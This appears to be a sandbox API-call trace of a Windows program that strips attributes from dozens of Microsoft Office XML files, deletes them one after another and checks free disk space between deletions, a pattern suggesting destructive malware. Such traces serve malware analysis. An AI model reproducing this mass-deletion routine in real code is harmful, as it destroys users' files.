[0078.632] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.PL.XML", dwFileAttributes=0x80) returned 1 [0078.632] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.PL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.pl.xml")) returned 1 [0078.635] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.639] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.SE.XML", dwFileAttributes=0x80) returned 1 [0078.639] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.SE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.se.xml")) returned 1 [0078.642] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0078.642] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0078.643] CoTaskMemFree (pv=0x506980) [0078.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.647] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.655] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL001.XML", dwFileAttributes=0x80) returned 1 [0078.655] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL001.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl001.xml")) returned 1 [0078.657] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.855] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL002.XML", dwFileAttributes=0x80) returned 1 [0078.855] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL002.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl002.xml")) returned 1 [0078.862] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.889] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL010.XML", dwFileAttributes=0x80) returned 1 [0078.889] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL010.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl010.xml")) returned 1 [0078.894] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.898] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL011.XML", dwFileAttributes=0x80) returned 1 [0078.898] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL011.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl011.xml")) returned 1 [0078.901] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL012.XML", dwFileAttributes=0x80) returned 1 [0078.971] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL012.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl012.xml")) returned 1 [0078.979] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.995] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL016.XML", dwFileAttributes=0x80) returned 1 [0078.995] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL016.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl016.xml")) returned 1 [0078.999] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.010] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL020.XML", dwFileAttributes=0x80) returned 1 [0079.010] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL020.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl020.xml")) returned 1 [0079.013] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL022.XML", dwFileAttributes=0x80) returned 1 [0079.027] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL022.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl022.xml")) returned 1 [0079.031] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.043] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL026.XML", dwFileAttributes=0x80) returned 1 [0079.043] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL026.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl026.xml")) returned 1 [0079.047] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.052] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL027.XML", dwFileAttributes=0x80) returned 1 [0079.053] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL027.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl027.xml")) returned 1 [0079.055] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.071] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL044.XML", dwFileAttributes=0x80) returned 1 [0079.071] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL044.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl044.xml")) returned 1 [0079.075] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.548] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL048.XML", dwFileAttributes=0x80) returned 1 [0079.548] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL048.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl048.xml")) returned 1 [0079.551] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.591] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL054.XML", dwFileAttributes=0x80) returned 1 [0079.592] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL054.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl054.xml")) returned 1 [0079.597] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.618] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL058.XML", dwFileAttributes=0x80) returned 1 [0079.618] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL058.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl058.xml")) returned 1 [0079.622] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL065.XML", dwFileAttributes=0x80) returned 1 [0079.634] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL065.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl065.xml")) returned 1 [0079.637] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL075.XML", dwFileAttributes=0x80) returned 1 [0079.729] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL075.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl075.xml")) returned 1 [0079.737] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.742] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL077.XML", dwFileAttributes=0x80) returned 1 [0079.742] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL077.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl077.xml")) returned 1 [0079.745] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.749] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL078.XML", dwFileAttributes=0x80) returned 1 [0079.752] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL078.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl078.xml")) returned 1 [0079.754] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL081.XML", dwFileAttributes=0x80) returned 1 [0079.859] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL081.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl081.xml")) returned 1 [0079.877] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.902] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL082.XML", dwFileAttributes=0x80) returned 1 [0079.902] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL082.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl082.xml")) returned 1 [0079.907] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL083.XML", dwFileAttributes=0x80) returned 1 [0079.916] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL083.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl083.xml")) returned 1 [0079.919] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0079.999] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL086.XML", dwFileAttributes=0x80) returned 1 [0079.999] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL086.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl086.xml")) returned 1 [0080.007] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.011] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL087.XML", dwFileAttributes=0x80) returned 1 [0080.011] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL087.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl087.xml")) returned 1 [0080.014] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.025] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL089.XML", dwFileAttributes=0x80) returned 1 [0080.026] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL089.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl089.xml")) returned 1 [0080.029] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.038] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL090.XML", dwFileAttributes=0x80) returned 1 [0080.039] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL090.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl090.xml")) returned 1 [0080.041] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.051] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL092.XML", dwFileAttributes=0x80) returned 1 [0080.051] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL092.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl092.xml")) returned 1 [0080.055] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.062] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL093.XML", dwFileAttributes=0x80) returned 1 [0080.062] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL093.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl093.xml")) returned 1 [0080.065] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.077] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL095.XML", dwFileAttributes=0x80) returned 1 [0080.077] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL095.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl095.xml")) returned 1 [0080.080] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.096] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL096.XML", dwFileAttributes=0x80) returned 1 [0080.096] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL096.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl096.xml")) returned 1 [0080.105] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.112] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL097.XML", dwFileAttributes=0x80) returned 1 [0080.112] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL097.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl097.xml")) returned 1 [0080.115] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL102.XML", dwFileAttributes=0x80) returned 1 [0080.214] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL102.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl102.xml")) returned 1 [0080.217] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.415] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL103.XML", dwFileAttributes=0x80) returned 1 [0080.415] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL103.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl103.xml")) returned 1 [0080.419] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.439] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL104.XML", dwFileAttributes=0x80) returned 1 [0080.440] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL104.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl104.xml")) returned 1 [0080.443] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.454] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL105.XML", dwFileAttributes=0x80) returned 1 [0080.454] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL105.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl105.xml")) returned 1 [0080.458] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.465] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL106.XML", dwFileAttributes=0x80) returned 1 [0080.466] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL106.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl106.xml")) returned 1 [0080.469] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.482] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL107.XML", dwFileAttributes=0x80) returned 1 [0080.482] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL107.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl107.xml")) returned 1 [0080.486] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.504] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL108.XML", dwFileAttributes=0x80) returned 1 [0080.504] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL108.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl108.xml")) returned 1 [0080.508] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, 